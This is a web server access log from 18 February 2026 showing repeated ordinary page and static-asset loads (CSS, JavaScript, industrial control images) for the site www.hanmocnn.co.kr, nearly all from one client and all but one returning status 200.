[Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:40:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.well-known/traffic-advice" [Client 66.249.82.70] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Chrome Privacy Preserving Prefetch Proxy" "-" -[18/Feb/2026:21:41:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.40] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" 